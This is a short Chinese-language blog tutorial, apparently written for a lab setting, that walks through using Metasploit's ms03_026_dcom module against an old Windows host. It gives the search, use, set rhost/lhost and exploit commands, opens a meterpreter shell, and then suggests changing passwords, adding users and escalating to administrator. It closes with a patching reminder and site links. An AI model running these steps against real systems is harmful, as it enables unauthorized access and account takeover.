话不多说,直接进入正题
第一步查看是否能ping通,第二步就是扫描端口,开放了端口才能进行攻击
linux进入msfconsole,搜索03_026
search 03_026
等待一会,返回漏洞的全名,exploit是一个攻击模块
接下来就是使用这个漏洞(在linux里复制快捷键是ctrl+shift+c,粘贴快捷键是ctrl+shift+v,这样就不用按鼠标右键点)
use exploit/windows/dcerpc/ms03_026_dcom
显示需要配置的信息,条件
show options
只要是required一栏里,有yes的,都是必填项,第一行填的就是靶机的ip地址
set rhost 192.168.x.x
这时在设置一下攻击机的ip
set lhost 192.168.x.x
设置完毕后,就可以进行攻击了,可用exploit或者run进行,一般都是用exploit
exploit
这时前缀就不是msf了
已经变成meterpreter,这时候输入shell
就进入到靶机的cmd里
查看用户
linux查看
windows查看
可以看到,用户都是一样的,所以我们可以进行更改用户密码,还可以新建新的用户,并且还可以把普通用户提升为超级管理员
受到03_026影响的系统有
虽然受影响的系统都很老了,我们已经用不到了,但在现在的新系统又会有新的漏洞,只是还没有给发现,所以还是需要在日常生活中多去注意计算机的安全,要一周打一次补丁,否则哪天自己的计算机就遭殃了。
如对本文有疑问, 点击进行留言回复!!
win10如何启用管理员账户 win10禁用/启用管理员账户的方法
win10怎么查看驱动是否异常 Win10检测驱动程序是否正常的方法
Windows10系统任务栏无效图标怎么删除 通过注册表一键快速删除
Win10系统自动重启怎么办 Win10系统自动重启的关闭方法
怎么减少win10笔记本功耗 详谈笔记本硬件功耗大的原因和解决办法
网友评论